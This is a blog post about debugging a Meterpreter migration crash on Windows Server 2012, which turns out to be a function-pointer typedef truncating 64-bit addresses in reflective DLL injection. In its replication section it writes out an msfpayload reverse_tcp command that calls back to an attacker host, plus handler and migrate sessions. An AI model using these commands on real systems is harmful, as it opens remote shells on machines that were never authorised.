The bug that was reported related to process migration, and went something like this (paraphrased slightly with a bit more information): Trying to migrate Meterpreter between processes on Windows 2012 seems to be unreliable. It will migrate just fine into some processes, such as explorer.exe, without any problems. However, spawning another process, such as notepad.exe, and migrating to it hangs the entire session. Migrating to the winlogon.exe process crashes the entire user environment on the target host.
When I first read this report I thought "Wow, how am I going to track this down?", and I'll admit that I was a little intimidated at first, especially given that I knew that the native Windows Meterpreter was using Reflective DLL Injection to load itself into other processes. However, it's been a long time since I'd been tasked with something this challenging and so, deep down, I was looking forward to diving in.
Replication
The first step was to fire up a Windows 2012 virtual machine and replicate the problem. Windows 2012 only comes in a 64-bit flavour, so picking the right version wasn't a problem. After installation, I needed to simulate an attack coming from Metasploit so that I could interact with Meterpreter to perform the migration. Creating a payload to do this is really simple thanks to msfpayload (part of Metasploit). On my Backtrack VM I used the following command to generate the PE image:
root@bt:~# msfpayload windows/x64/meterpreter/reverse_tcp LHOST=10.5.26.40 LPORT=443 X > 40-443-x64.exe
This command creates a 64-bit Windows executable that contains a small stager. This stager connects to 10.5.26.40 (my Backtrack VM) on port 443 (I always choose the HTTPS port to avoid potential outbound firewall issues). Once connected it will download the Meterpreter payload and establish a session with Metasploit. I copied this binary to the Windows 2012 machine ready to execute.
At this point, Metasploit needs to be set up and configured to deal with the incoming request. On the Backtrack VM, we run msfconsole and set it up to use multi/handler with the appropriate settings, like so: msf exploit(handler) > show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- ----------- Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST 10.5.26.40 yes The listen address LPORT 443 yes The listen port Exploit target: Id Name -- ---- 0 Wildcard Target With those settings in place, the exploit was ready to fire: msf exploit(handler) > exploit [*] Started reverse handler on 10.5.26.40:443 [*] Starting the payload handler... From the Windows 2012 VM I ran the exploit binary and my Metepreter session kicked off: [*] Sending stage (951296 bytes) to 10.5.26.30 [*] Meterpreter session 1 opened (10.5.26.40:443 -> 10.5.26.30:38516) at 2013-09-11 21:55:52 +1000 meterpreter > getuid Server username: WIN-URCAUVPE291\OJ Reeves meterpreter > sysinfo Computer : WIN-URCAUVPE291 OS : Windows 2012 (Build 9200). Architecture : x64 System Language : en_US Meterpreter : x64/win64 meterpreter > Before trying the failure case, I wanted to make sure that the known success case worked locally first. 
I decided to migrate to explorer.exe and see if anything changed: meterpreter > ps Process List ============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4294967295 4 0 System 4294967295 444 4 smss.exe 4294967295 484 708 svchost.exe 4294967295 536 524 csrss.exe 4294967295 604 596 csrss.exe 4294967295 612 524 wininit.exe 4294967295 640 596 winlogon.exe 4294967295 692 720 explorer.exe x86_64 1 WIN-URCAUVPE291\OJ Reeves C:\Windows\Explorer.EXE 708 612 services.exe 4294967295 716 612 lsass.exe 4294967295 804 708 svchost.exe 4294967295 816 708 svchost.exe 4294967295 ... snip ... meterpreter > migrate 692 [*] Migrating from 1508 to 692... [*] Migration completed successfully. meterpreter > getuid Server username: WIN-URCAUVPE291\OJ Reeves meterpreter > sysinfo Computer : WIN-URCAUVPE291 OS : Windows 2012 (Build 9200). Architecture : x64 System Language : en_US Meterpreter : x64/win64 meterpreter > Migration seemed to work. Next I tried the failure case. First I launched notepad.exe and then attempted to migrate to it: meterpreter > execute -f notepad.exe -t -H Process 192 created. meterpreter > migrate 192 [*] Migrating from 692 to 192... [-] Error running command migrate: Rex::RuntimeError No response was received to the core_loadlib request. meterpreter > The session hung at this point and no Meterpreter commands would work. When I went over to the Windows 2012 VM I saw that there was a notification that the notepad.exe process had crashed. This was great as I was able to reproduce the failure. It was time to investigate the problem. Diagnosis To help figure out what was going wrong, I enlisted the help of two of my favourite tools: DebugView and Windbg. Coverage of these tools is beyond the scope of the article, so if you want to learn more about them you’ll find a stack of information out on the web. 
Given that this machine was 64-bit and the process we were aiming to debug was 64-bit, I installed the 64-bit version of the Debugging Tools for Windows so that the right version of windbg was available. Before dabbling with any of the binaries and adding debug detail, I repeated the failure scenario but with one small change: I launched notepad.exe manually and attached to it from windbg prior to performing the migration. I left DebugView running as well to catch any debug messages from processes outside of the one that windbg was attached to. Upon running the migrate command notepad.exe crashed and windbg caught the exception. This is what it showed: (ab0.448): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. 00000000`707a7b5c ?? ??? We can see that we’re accessing memory that we shouldn’t be accessing. But why? 0:003> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* FAULTING_IP: unknown!printable+0 00000000`707a7b5c ?? ??? EXCEPTION_RECORD: ffffffffffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 00000000707a7b5c ExceptionCode: c0000005 (Access violation) ExceptionFlags: 00000000 NumberParameters: 2 Parameter[0]: 0000000000000008 Parameter[1]: 00000000707a7b5c Attempt to execute non-executable address 00000000707a7b5c ... snip ... The migration process results in an attempt to execute a section of code in an area of memory that isn’t marked as executable. Let’s confirm that: 0:003> !vprot 00000000707a7b5c BaseAddress: 00000000707a7000 AllocationBase: 0000000000000000 RegionSize: 000000000f839000 State: 00010000 MEM_FREE Protect: 00000001 PAGE_NOACCESS As we can see the memory area is definitely not marked as executable. But should it be? 
Should this memory be executable, or are we just pointing to an invalid area of memory? If it was the former, then it might imply that DEP or ASLR are somehow interfering. However, my gut feeling was that it was the latter. A quick look at the contents of the memory at this location would be enough to confirm: 0:003> du 00000000707a7b5c 00000000`707a7b5c "????????????????????????????????" 00000000`707a7b9c "????????????????????????????????" 00000000`707a7bdc "????????????????????????????????" 00000000`707a7c1c "????????????????????????????????" 00000000`707a7c5c "????????????????????????????????" 00000000`707a7c9c "????????????????????????????????" 00000000`707a7cdc "????????????????????????????????" 00000000`707a7d1c "????????????????????????????????" 00000000`707a7d5c "????????????????????????????????" 00000000`707a7d9c "????????????????????????????????" 00000000`707a7ddc "????????????????????????????????" 00000000`707a7e1c "????????????????????????????????" It’s pretty clear that no valid code is located in this area of memory. This implied that there was a possibility that a pointer to an area of code is somehow going awry. But where? To find this out, I needed to add some more debug output to Meterpreter. Next, I opened the Meterpreter source in Visual Studio 2012 (freshly moved from VS 2010 by yours truly) and prepared to rebuild the binaries with some extra debug output. I littered the code with OutputDebugString calls at various key locations, enabled the existing logging that was built into the source, and rebuilt the suite of binaries from scratch. Once built, I deployed them to my Backtrack VM, fired up DebugView on the Windows 2012 VM and repeated the process (including attaching to notepad.exe with windbg). Here’s a snippet of the output: [SERVER] Initializing... [SERVER] module loaded at 0x350B0000 [SERVER] main server thread: handle=0x00000138 id=0x000008F0 sigterm=0x334D7B20 [SERVER] Using SSL transport... [SERVER] Initializing tokens... 
[SERVER] Flushing the socket handle... [SERVER] Initializing SSL... [SERVER] Negotiating SSL... ModLoad: 000007ff`58060000 000007ff`58075000 C:\Windows\system32\NETAPI32.DLL ModLoad: 000007ff`586d0000 000007ff`586de000 C:\Windows\system32\netutils.dll ModLoad: 000007ff`5b020000 000007ff`5b044000 C:\Windows\system32\srvcli.dll ModLoad: 000007ff`58020000 000007ff`58035000 C:\Windows\system32\wkscli.dll ModLoad: 000007ff`5ad10000 000007ff`5ad2a000 C:\Windows\system32\CRYPTSP.dll ModLoad: 000007ff`5a990000 000007ff`5a9d9000 C:\Windows\system32\rsaenh.dll [SERVER] Sending a HTTP GET request to the remote side... [SERVER] Completed writing the HTTP GET request: 27 [SERVER] Registering dispatch routines... Registering a new command (core_loadlib)... Allocated memory... Setting new command... Fixing next/prev... Done... [SERVER] Entering the main server dispatch loop for transport 0... [DISPATCH] entering server_dispatch( 0x334D7B60 ) [SCHEDULER] entering scheduler_initialize. [SCHEDULER] leaving scheduler_initialize. 
[DISPATCH] created command_process_thread 0x33523030, handle=0x000001F0 [COMMAND] Processing method core_loadlib [COMMAND] core_loadlib: Entry [COMMAND] core_loadlib: libraryPath (ext264209.x64.dll) flags (2) [COMMAND] core_loadlib: lib does not exist locally (being uploaded) [COMMAND] core_loadlib: lib is not to be stored on disk [LOADLIBRARYR] starting [LOADLIBRARYR] GetReflectiveLoaderOffset [LOADLIBRARYR] GetReflectiveLoaderOffset (5488) [LOADLIBRARYR] Calling VirtualProtect lpBuffer (0000008935318B20) length (428544) [LOADLIBRARYR] Calling pReflectiveLoader (000000893531A090) ModLoad: 000007ff`555e0000 000007ff`55600000 C:\Windows\system32\WINMM.dll ModLoad: 000007ff`555a0000 000007ff`555d2000 C:\Windows\system32\WINMMBASE.dll ModLoad: 000007ff`57e00000 000007ff`57e2c000 C:\Windows\system32\IPHLPAPI.DLL ModLoad: 000007ff`57de0000 000007ff`57dea000 C:\Windows\system32\WINNSI.DLL [LOADLIBRARYR] Calling pDllMain (0000000033449BEC) (9b8.968): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. 00000000`33449bec ?? ??? The extra debug calls that I added to the source are those marked with [LOADLIBRARYR]. These calls were located in the guts of the reflective DLL injection code. As we already know from earlier in this post, the reflective DLL injection code dynamically builds a valid DLL image in memory and then invokes it. The method which builds this DLL image is called ReflectiveLoader() and is invoked in code via a pointer called pReflectiveLoader, which you can see in the above output. At the end of the ReflectiveLoader() function, a reference to DllMain() is resolved and invoked directly prior to returning control to the caller. Once this function returns, the Meterpreter-specific code then calls DllMain() again, using the value returned from ReflectiveLoader(), to invoke some functionality required by the Metasploit framework. 
In the above output, you can see the pointer to DllMain() called pDllMain, and this is the pointer that’s used to make the call. What was interesting about the log is that the first call to DllMain() that is invoked in the body of ReflectiveLoader() worked fine, otherwise the process would have crashed prior to the line that outputs the value of the pDllMain variable. Instead, it was the second call to DllMain() via the pDllMain pointer that caused the crash. This implied that the memory address that was being returned from ReflectiveLoader() was incorrect. The nature of the reflective loading mechanism implied to me that the addresses of pReflectiveLoader and pDllMain should actually be quite close together in memory. However, focussing on a small part of the output, I noticed the following: [LOADLIBRARYR] Calling pReflectiveLoader (000000893531A090) [LOADLIBRARYR] Calling pDllMain (0000000033449BEC) Those two pointers were nowhere near each other! The more perceptive of you will have noticed that the pDllMain pointer appeared to have lost its higher-order DWORD. The pointer had in fact been truncated! But why? It wasn’t immediately obvious to me what the reason was, but I was keen to validate that this was the case. To prove my theory, I hacked the code a little so that the higher-order DWORD of the pReflectiveLoader value was used as the higher-order DWORD of pDllMain as well. The hack looked something like this: ULONG_PTR ulReflectiveLoaderBase = ((ULONG_PTR)pReflectiveLoader) & (((ULONG_PTR)-1) ^ (0xFFFFFFFF)); pDllMain = (DLLMAIN)(pReflectiveLoader() | ulReflectiveLoaderBase); After the above code, pDllMain would have the same higher-order DWORD value as pReflectiveLoader. I compiled, deployed, executed … … and it worked! Resolution Armed with the knowledge earned from the above diagnosis, I set about looking through the code to see why this pointer was being truncated. 
Clearly the value was perfectly fine prior to being returned from ReflectiveLoader(), so why was it truncated upon return? I spent quite a bit of time looking around, and I didn't find anything. Nothing was leaping out at me. I felt really stupid. So instead of beating about the bush, I contacted the man himself, the author and creator of Reflective DLL Injection, Mr Stephen Fewer. I explained the situation to him, detailed my findings and asked if he had any idea as to why this problem might be occurring. It didn't take long to get a response. Stephen jumped on the issue straight away, fixed it and submitted a pull request to the Meterpreter repository before emailing me back with details of the solution. Talk about great service! When I saw the solution I immediately felt stupid for missing it myself. In hindsight I should have known to look in this location. I ate some humble pie and savoured the taste while expressing my gratitude to Stephen for his prompt response. So what was it? The pReflectiveLoader pointer is a function pointer of a type defined like so:
typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
However, the ReflectiveLoader() function was defined in the source like so:
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
#else
DLLEXPORT ULONG_PTR WINAPI ReflectiveLoader( VOID )
#endif
{
// ... snip ...
}
So the function returns a ULONG_PTR (which is 64 bits wide) but the function pointer type returned a DWORD (which is 32 bits wide). This is what was causing the truncation of the pointer and effectively zeroing out the higher-order DWORD of pDllMain. The fix was to simply change the return type of the function pointer to match:
typedef ULONG_PTR (WINAPI * REFLECTIVELOADER)( VOID );
Problem solved.
Extra Thoughts and Conclusion
For those of you who are wondering, like I was, why this was an intermittent problem, the answer lies in the fact that the new versions of Windows have newer versions of ASLR. To quote Stephen: The bug was triggering on Server 2012 but not other 64bit systems probably due to high entropy ASLR making allocations over the 4gig boundary. Earlier versions of Windows didn't have an ASLR implementation that resulted in memory allocations over the 4GB boundary. As a result, the higher-order DWORD was always zero anyway, which meant that the truncation had no impact. This was a really fun bug to analyse and track down. I'm glad we got to the bottom of it. Again I'd like to thank Stephen for his involvement in locating the source of the problem. The new and improved version of Meterpreter that contains this fix will be landing in Metasploit very soon (I hope). Thanks for reading. Comments and feedback are welcomed.
Source: 64bit Pointer Truncation in Meterpreter - OJ's perspective